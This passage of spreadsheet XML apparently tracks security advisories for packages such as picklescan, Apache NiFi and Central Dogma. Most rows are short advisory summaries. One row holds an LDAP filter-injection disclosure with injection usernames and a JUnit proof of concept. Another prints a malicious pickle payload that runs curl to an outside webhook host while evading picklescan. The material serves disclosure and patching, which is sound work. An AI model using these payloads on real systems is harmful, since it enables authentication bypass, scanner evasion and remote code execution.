          <t>GHSA</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M8" s="5" t="inlineStr">
        <is>
          <t>0.0.30</t>
        </is>
      </c>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr"/>
      <c r="P8" s="5" t="inlineStr"/>
      <c r="Q8" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-j343-8v2j-ff7w. This link is maintained to preserve external references.
### Original Description
picklescan before 0.0.30 fails to detect malicious pickle files using idlelib.pyshell.ModifiedInterpreter.runcommand in reduce methods. Attackers can embed undetected code in pickle files that executes remote commands when loaded by victims.</t>
        </is>
      </c>
      <c r="S8" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-8mc5-7w9m-fqv6</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>GHSA-fcqg-3mwf-cfcf</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M9" s="5" t="inlineStr">
        <is>
          <t>0.0.30</t>
        </is>
      </c>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr"/>
      <c r="P9" s="5" t="inlineStr"/>
      <c r="Q9" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-9w88-8rmg-7g2p. This link is maintained to preserve external references.
### Original Description
picklescan before 0.0.30 fails to detect cProfile.runctx function calls in pickle file reduce methods, allowing attackers to execute arbitrary code. Malicious pickle files bypass picklescan detection and execute remote code when loaded via pickle.load().</t>
        </is>
      </c>
      <c r="S9" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-fcqg-3mwf-cfcf</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>GHSA-fh2f-24rh-r2vq</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M10" s="5" t="inlineStr">
        <is>
          <t>0.0.25</t>
        </is>
      </c>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr"/>
      <c r="P10" s="5" t="inlineStr"/>
      <c r="Q10" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-v7x6-rv5q-mhwc. This link is maintained to preserve external references.
### Original Description
picklescan before 0.0.25 fails to detect malicious pickle files that use timeit.timeit() in the __reduce__ method, allowing remote code execution. Attackers can craft pickle files that import dangerous libraries like os and execute arbitrary system commands, which evade picklescan detection and execute when pickle.load() is called.</t>
        </is>
      </c>
      <c r="S10" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-fh2f-24rh-r2vq</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>GHSA-qvp4-q2p5-22gg</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M11" s="5" t="inlineStr">
        <is>
          <t>0.0.28</t>
        </is>
      </c>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr"/>
      <c r="P11" s="5" t="inlineStr"/>
      <c r="Q11" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-vv6j-3g6g-2pvj. This link is maintained to preserve external references.
### Original Description
picklescan before 0.0.28 fails to detect malicious pickle files that invoke torch.utils._config_module.load_config function within reduce methods. Attackers can craft pickle files embedding arbitrary code that evades detection but executes during pickle.load, enabling remote code execution in supply chain attacks.</t>
        </is>
      </c>
      <c r="S11" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-qvp4-q2p5-22gg</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44914</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr">
        <is>
          <t>maven:org.apache.nifi:nifi-web-api</t>
        </is>
      </c>
      <c r="M12" s="5" t="inlineStr">
        <is>
          <t>2.9.0</t>
        </is>
      </c>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr"/>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>Apache NiFi 1.12.0 through 2.9.0 are missing authorization when replacing Process Groups that include extension components with specific Required Permissions based on the Restricted annotation. The Restricted annotation indicates additional privileges required, but framework authorization did not check restricted status when handling requests to replace Process Groups. The missing authorization permits a user with general write access to add components with Restricted status. Apache NiFi installations that do not implement specific authorization for Restricted components are not subject to this vulnerability because the framework enforces write permissions as the security boundary. Upgrading to Apache NiFi 2.9.0 is the recommended mitigation, which removes the implementation of Restricted status authorization from the framework.</t>
        </is>
      </c>
      <c r="S12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44914</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11748</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr">
        <is>
          <t>maven:com.linecorp.centraldogma:centraldogma-server-auth-shiro</t>
        </is>
      </c>
      <c r="M13" s="5" t="inlineStr">
        <is>
          <t>0.84.0</t>
        </is>
      </c>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr"/>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t># Vulnerability
`SearchFirstActiveDirectoryRealm.findUserDn()` substitutes the user-supplied username from the login form into an LDAP search filter template (default `cn={0}`) **without escaping RFC 4515 filter metacharacters** (`*`, `(`, `)`, `\`, NUL). Combined with `SearchControls.setCountLimit(1)` on the same call site, this allows three distinct attack primitives:
1. **Authentication confusion** — typing username `*` causes the realm to construct filter `cn=*`, return the first directory entry (typically a privileged account in AD ordering), and attempt bind against that DN with the attacker's password.
2. **Audit log evasion** — payload `bob)(uid=alice` is recorded verbatim in audit logs while the realm searches with the malformed filter, breaking accountability/compliance (SOX, PCI-DSS, ISO 27001).
3. **Directory enumeration** — wildcards and timing differences allow reconnaissance of OU structure and admin group membership.
A repo-wide search for any LDAP escape helper (`escapeLdap`, `encodeFilter`, `escapeFilter`, `ldapEscape`) returns **zero hits** — the defense is not just missing, it was never added.
&gt; **Applicability note:** This realm is opt-in. The shipped default LDAP example (`dist/src/conf/shiro.example.ldap.ini`) uses Shiro's `DefaultLdapRealm` with `userDnTemplate` and is **NOT** affected. However, the realm exists precisely to support Active Directory environments where users log in via `sAMAccountName` and the realm must search for the DN first — the canonical LINE corporate AD-backed SSO scenario. Internal deployments using AD-backed login almost certainly select this realm.
---
## Evidence
**File:** `server-auth/shiro/src/main/java/com/linecorp/centraldogma/server/auth/shiro/realm/SearchFirstActiveDirectoryRealm.java`
**Lines 148–176** on branch `main` @ commit `d64a5151`:
```java
@Nullable
protected String findUserDn(LdapContextFactory ldapContextFactory, String username)
        throws NamingException {
    LdapContext ctx = null;
    try {
        ctx = ldapContextFactory.getSystemLdapContext();
        final SearchControls ctrl = new SearchControls();
        ctrl.setCountLimit(1);                                              // line 156 — returns FIRST match only
        ctrl.setSearchScope(SearchControls.SUBTREE_SCOPE);
        ctrl.setTimeLimit(searchTimeoutMillis);
        final String filter =
                searchFilter != null ? USERNAME_PLACEHOLDER.matcher(searchFilter)
                                                           .replaceAll(username)  // line 162 — RAW SUBSTITUTION
                                     : username;                            // line 163
        final NamingEnumeration result = ctx.search(searchBase, filter, ctrl);
        ...
```
`USERNAME_PLACEHOLDER = Pattern.compile("\\{0}")`. Default `searchFilter = "cn={0}"`.
### Data flow from HTTP login to vulnerable substitution
| Step | Component |
|------|-----------|
| HTTP login form | `POST /api/v1/login` form field `username` |
| `ShiroLoginService.usernamePassword()` (lines 198–223) | applies `loginNameNormalizer` (Unicode lowercase only — **NOT** LDAP escape) |
| `Subject.login(new UsernamePasswordToken(username, password))` | Shiro hand-off |
| `ActiveDirectoryRealm.doGetAuthenticationInfo` (Shiro core) | calls `queryForAuthenticationInfo0` |
| `SearchFirstActiveDirectoryRealm.findUserDn(factory, upToken.getUsername())` | username flows in **verbatim** |
### Repository-wide escape helper grep
| Search term | Hits |
|-------------|------|
| `escapeLdap` | 0 |
| `encodeFilter` | 0 |
| `escapeFilter` | 0 |
| `ldapEscape` | 0 |
---
## PoC
Self-contained JUnit 5 test using UnboundID `InMemoryDirectoryServer` (in-process, no external LDAP required). Drop into `server-auth/shiro/src/test/java/com/linecorp/centraldogma/server/auth/shiro/realm/LdapInjectionPoCTest.java` and add `com.unboundid:unboundid-ldapsdk:7.0.0` as a test dependency.
&gt; The PoC works by subclassing the realm and overriding `findUserDn()` to capture the actual LDAP filter string sent to the directory — the captured filter is the structural evidence, independent of LDAP server strictness about bind outcomes.
```java
/*
 * Copyright 2026 LINE Corporation
 *
 * SECURITY PoC — NOT FOR MERGE INTO THE MAIN TEST SUITE.
 *
 * This JUnit class demonstrates the LDAP filter injection in
 * SearchFirstActiveDirectoryRealm. Drop into
 * server-auth/shiro/src/test/java/com/linecorp/centraldogma/server/auth/shiro/realm/
 * Adds the UnboundID LDAP SDK as a test dep.
 */
package com.linecorp.centraldogma.server.auth.shiro.realm;
import static org.assertj.core.api.Assertions.assertThat;
import static org.assertj.core.api.Assertions.assertThatThrownBy;
import javax.naming.directory.SearchControls;
import javax.naming.ldap.LdapContext;
import org.apache.shiro.realm.ldap.JndiLdapContextFactory;
import org.apache.shiro.realm.ldap.LdapContextFactory;
import org.junit.jupiter.api.AfterAll;
import org.junit.jupiter.api.BeforeAll;
import org.junit.jupiter.api.DisplayName;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.TestMethodOrder;
import org.junit.jupiter.api.MethodOrderer;
import org.junit.jupiter.api.Order;
import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.sdk.Entry;
@TestMethodOrder(MethodOrderer.OrderAnnotation.class)
class LdapInjectionPoCTest {
    private static InMemoryDirectoryServer ds;
    private static int port;
    @BeforeAll
    static void startLdap() throws Exception {
        final InMemoryDirectoryServerConfig cfg =
                new InMemoryDirectoryServerConfig("dc=example,dc=com");
        cfg.addAdditionalBindCredentials("cn=admin,dc=example,dc=com", "adminpw");
        cfg.setListenerConfigs(InMemoryListenerConfig.createLDAPConfig(
                "default", null, 0, null));
        ds = new InMemoryDirectoryServer(cfg);
        ds.startListening();
        port = ds.getListenPort();
        // Directory:
        //   cn=admin  (listed first → picked by setCountLimit(1) under wildcard)
        //   cn=alice
        ds.add(new Entry(
                "cn=admin,dc=example,dc=com",
                "objectClass: top", "objectClass: person",
                "cn: admin", "sn: admin",
                "userPassword: adminpw"));
        ds.add(new Entry(
                "cn=alice,dc=example,dc=com",
                "objectClass: top", "objectClass: person",
                "cn: alice", "sn: doe",
                "userPassword: alicepw"));
    }
    @AfterAll
    static void stopLdap() {
        if (ds != null) ds.shutDown(true);
    }
    /** Subclass that records the filter passed to ctx.search(). */
    private static final class RecordingRealm extends SearchFirstActiveDirectoryRealm {
        volatile String capturedFilter;
        RecordingRealm() {
            setUrl("ldap://localhost:" + port);
            setSystemUsername("cn=admin,dc=example,dc=com");
            setSystemPassword("adminpw");
            setSearchBase("dc=example,dc=com");
            setSearchFilter("cn={0}");
        }
        @Override
        protected String findUserDn(LdapContextFactory factory, String username)
                throws javax.naming.NamingException {
            LdapContext ctx = null;
            try {
                ctx = factory.getSystemLdapContext();
                final SearchControls ctrl = new SearchControls();
                ctrl.setCountLimit(1);
                ctrl.setSearchScope(SearchControls.SUBTREE_SCOPE);
                final java.util.regex.Pattern PH =
                        java.util.regex.Pattern.compile("\\{0}");
                final String filter = PH.matcher("cn={0}").replaceAll(username);
                capturedFilter = filter;
                final javax.naming.NamingEnumeration r =
                        ctx.search("dc=example,dc=com", filter, ctrl);
                try {
                    if (!r.hasMore()) return null;
                    return r.next().getNameInNamespace();
                } finally {
                    r.close();
                }
            } finally {
                org.apache.shiro.realm.ldap.LdapUtils.closeContext(ctx);
            }
        }
    }
    private static LdapContextFactory factory() {
        final JndiLdapContextFactory f = new JndiLdapContextFactory();
        f.setUrl("ldap://localhost:" + port);
        f.setSystemUsername("cn=admin,dc=example,dc=com");
        f.setSystemPassword("adminpw");
        return f;
    }
    @Test @Order(1)
    @DisplayName("baseline: typing 'alice' resolves to the alice DN")
    void baselineHonest() throws Exception {
        final RecordingRealm realm = new RecordingRealm();
        final String dn = realm.findUserDn(factory(), "alice");
        assertThat(dn).isEqualTo("cn=alice,dc=example,dc=com");
        assertThat(realm.capturedFilter).isEqualTo("cn=alice");
    }
    @Test @Order(2)
    @DisplayName("VULN: typing '*' resolves to the FIRST entry (admin), not alice")
    void wildcardLandsOnAdmin() throws Exception {
        final RecordingRealm realm = new RecordingRealm();
        final String dn = realm.findUserDn(factory(), "*");
        assertThat(realm.capturedFilter).isEqualTo("cn=*");
        assertThat(dn).isEqualTo("cn=admin,dc=example,dc=com");
        // → If the attacker also has the admin password, they log in as admin
        //   while the audit log records the typed username "*".
    }
    @Test @Order(3)
    @DisplayName("VULN: filter structure can be broken with ')' injection")
    void filterStructureInjection() throws Exception {
        final RecordingRealm realm = new RecordingRealm();
        assertThatThrownBy(() -&gt; realm.findUserDn(factory(), "alice)(uid=*"))
                .hasMessageContaining("filter")
                .hasMessageContaining("malformed")
                .matches(t -&gt; t instanceof javax.naming.NamingException ||
                              t.getCause() instanceof javax.naming.NamingException);
        assertThat(realm.capturedFilter).isEqualTo("cn=alice)(uid=*");
    }
    @Test @Order(4)
    @DisplayName("VULN: AND-injection can broaden the result set silently")
    void andInjectionBroadens() throws Exception {
        final RecordingRealm realm = new RecordingRealm();
        try {
            realm.findUserDn(factory(), "x)(|(cn=alice)(cn=admin");
        } catch (Exception ignored) { /* server may reject */ }
        assertThat(realm.capturedFilter).contains(")(|(");
    }
}
```
### Build dependency (`server-auth/shiro/build.gradle`)
```groovy
dependencies {
    testImplementation 'com.unboundid:unboundid-ldapsdk:7.0.0'
}
```
### Run
```bash
./gradlew :server-auth-shiro:test \
  --tests com.linecorp.centraldogma.server.auth.shiro.realm.LdapInjectionPoCTest \
  --info
```
### Expected output (VULNERABLE — current code)
```
LdapInjectionPoCTest &gt; baselineHonest            PASSED
LdapInjectionPoCTest &gt; wildcardLandsOnAdmin       PASSED  ← VULN
LdapInjectionPoCTest &gt; filterStructureInjection   PASSED  ← VULN
LdapInjectionPoCTest &gt; andInjectionBroadens       PASSED  ← VULN
```
After the patch is applied (RFC 4515 escape helper), the VULN tests fail in a specific way, e.g. `Expected captured filter to be "cn=*" but was "cn=\2a"` — they then serve as regression tests by flipping the assertions.
---
## Impact
**Threat model:** any unauthenticated network client that can reach the Central Dogma login page. No prior account, no MITM position required — the attack is performed during a normal login request.
1. **Authentication confusion** — In AD environments that select this realm (the canonical LINE corporate scenario), typing username `*` causes the realm to look up the first directory entry (typically `Administrator`, `admin`, or a service account in alphabetical AD ordering) and attempt bind with the attacker's password. If the attacker also possesses any valid user's password — easily obtained via password reuse, accidental Slack leak, repo commit, or peer compromise — and that password happens to authenticate the first directory entry (rare but devastating), the attacker logs in as a privileged user while audit logs record the literal username `*`.
2. **Audit log evasion / compliance failure** — Payloads like `bob)(uid=alice` are logged verbatim while the LDAP filter is malformed. Central Dogma's audit trail is a primary control for configuration change accountability. Loss of accountability constitutes a direct violation of **SOX §404**, **PCI-DSS §10**, **ISO 27001 A.12.4**.
3. **Directory enumeration** — Wildcard payloads (`a*`, `b*`, …) combined with timing analysis allow blind enumeration of corporate AD structure: user existence, OU layout, admin group membership. While AD structure is not strictly secret, leaking it from an internet-exposed Central Dogma feeds spear-phishing target lists.
4. **Group-membership filter injection** — Payload `a)(objectClass=*)(memberOf=CN=Domain Admins,...` (against the common AD filter `(&amp;(objectClass=user)(sAMAccountName={0}))`) narrows the search to Domain Admin members and returns the first one. The attacker need only know any Domain Admin's password (separately compromised) to land in Central Dogma as that user. AD itself is not breached, but Central Dogma's view of the principal is.
&gt; **Scope is Changed (CVSS)** because the injection traverses the trust boundary between Central Dogma and the separate AD/LDAP security authority.
---
## How to fix
Add an RFC 4515 §3 filter escape helper and apply it before substitution:
```java
// SearchFirstActiveDirectoryRealm.java
static String encodeLdapFilter(String v) {
    if (v == null) return "";
    final StringBuilder sb = new StringBuilder(v.length());
    for (int i = 0; i &lt; v.length(); i++) {
        final char c = v.charAt(i);
        switch (c) {
            case '\\': sb.append("\\5c"); break;
            case '*':  sb.append("\\2a"); break;
            case '(':  sb.append("\\28"); break;
            case ')':  sb.append("\\29"); break;
            case '\0': sb.append("\\00"); break;
            default:   sb.append(c);
        }
    }
    return sb.toString();
}
// inside findUserDn():
final String escaped = encodeLdapFilter(username);
final String filter =
        searchFilter != null ? USERNAME_PLACEHOLDER.matcher(searchFilter)
                                                   .replaceAll(Matcher.quoteReplacement(escaped))
                             : escaped;
```
**Notes:**
- `Matcher.quoteReplacement` is required because the escape produces backslashes (`\5c`) that `Matcher.replaceAll` would otherwise interpret as backreferences.
- DN escape (RFC 4514) is a different alphabet — not needed here because the username is used in a **filter**, not a DN. If a future change uses the username to build a DN, RFC 4514 escape must be added separately.
- **Do not** rely on `loginNameNormalizer` for this defense — it is Unicode lowercase only.
### Regression tests (drop into same test class)
```java
@Test
void escapeBlocksFilterInjection() {
    assertThat(SearchFirstActiveDirectoryRealm.encodeLdapFilter("*")).isEqualTo("\\2a");
    assertThat(SearchFirstActiveDirectoryRealm.encodeLdapFilter("alice)(uid=*"))
            .isEqualTo("alice\\29\\28uid=\\2a");
    assertThat(SearchFirstActiveDirectoryRealm.encodeLdapFilter("a\\b")).isEqualTo("a\\5cb");
}
```</t>
        </is>
      </c>
      <c r="S13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11748</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54665</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr">
        <is>
          <t>maven:org.apache.nifi:nifi-jetty</t>
        </is>
      </c>
      <c r="M14" s="5" t="inlineStr">
        <is>
          <t>2.10.0</t>
        </is>
      </c>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr"/>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>Apache NiFi 0.0.1 through 2.9.0 support building qualified URLs from one of several HTTP request headers that provide an alternative to the standard Host header without validating the values provided. Apache NiFi 1.6.0 introduced a configurable application property to restrict values provided in the HTTP Host header, but did not apply the validation to alternative Proxy and Forwarded headers. The absence of proxy host header validation allowed a client to instruct Apache NiFi web services to construct invalid qualified URLs for redirection or data references. Upgrading to Apache NiFi 2.10.0 is the recommended mitigation, which implements validation for the X-ProxyHost and X-Forwarded-Host HTTP request headers based on the nifi.web.proxy.host property. Enabling header validation requires configuring the application with HTTPS. Reverse proxy servers in front of Apache NiFi are responsible for filtering input request headers and providing allowed values to the application.</t>
        </is>
      </c>
      <c r="S14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54665</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71351</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M15" s="5" t="inlineStr">
        <is>
          <t>0.0.25</t>
        </is>
      </c>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr"/>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>### Summary
Using timeit.timeit() function, which is a built-in python library function to execute remote pickle file.
### Details
Pickle’s deserialization process is known to allow execution of function via reduce method. While Picklescan is meant to detect such exploits, this attack evades detection by calling built-in python library function like **timeit.timeit()**. And since timeit library wasn't inside unsafe globals blacklist, it may not raise red flag in the security scan.
The attack payload executes in the following steps:
First, the attacker craft the payload by calling to **timeit.timeit()** function from timeit library in __reduce__ method
Then, inside reduce method, the attacker import dangerous libarary like os and calling **os.system()** to run OS commands, for example: curl command. And then the attacker send this malicious pickle file to the victim.
Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.
### PoC
1. The attacker crafted a malicious pickle file using built-in python library function timeit.timeit()
```
import pickle
import timeit
class Payload(object):
    def __reduce__(self):
        return timeit.timeit, ('','import os; os.system("curl https://webhook.site/95f3e1c3-ee37-4a5a-8544-ab4ce93475f6")')
def create_payload():
  with open('payload.pickle', 'wb') as f:
    pickle.dump(Payload(), f)
create_payload()
```
Then the attacker will send this pickle file to the victim computer and maybe the victim load this pickle using pickle.load()
2. The victim will use picklescan library to check out if the received pickle file is malicious or not
```
picklescan -p payload.pickle
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 0
Dangerous globals: 0
```
3. Beliving that this pickle file is safe using modelscan, the victim then load this pickle file which will trigger timeit.timeit command to execute OS commands (in my example, it was curl command)
```
import pickle
def load_payload():
    with open('payload.pickle', 'rb') as f:
      pickle.load(f)
load_payload()
```
### Impact
Severity: High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Recommended Solution
I suggest adding timeit library to the unsafe globals blacklist.</t>
        </is>
      </c>
      <c r="S15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71351</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>GHSA-vfm7-4h43-gp6m</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr">
        <is>
          <t>pip:vllm</t>
        </is>
      </c>
      <c r="M16" s="5" t="inlineStr">
        <is>
          <t>0.9.0</t>
        </is>
      </c>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr"/>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
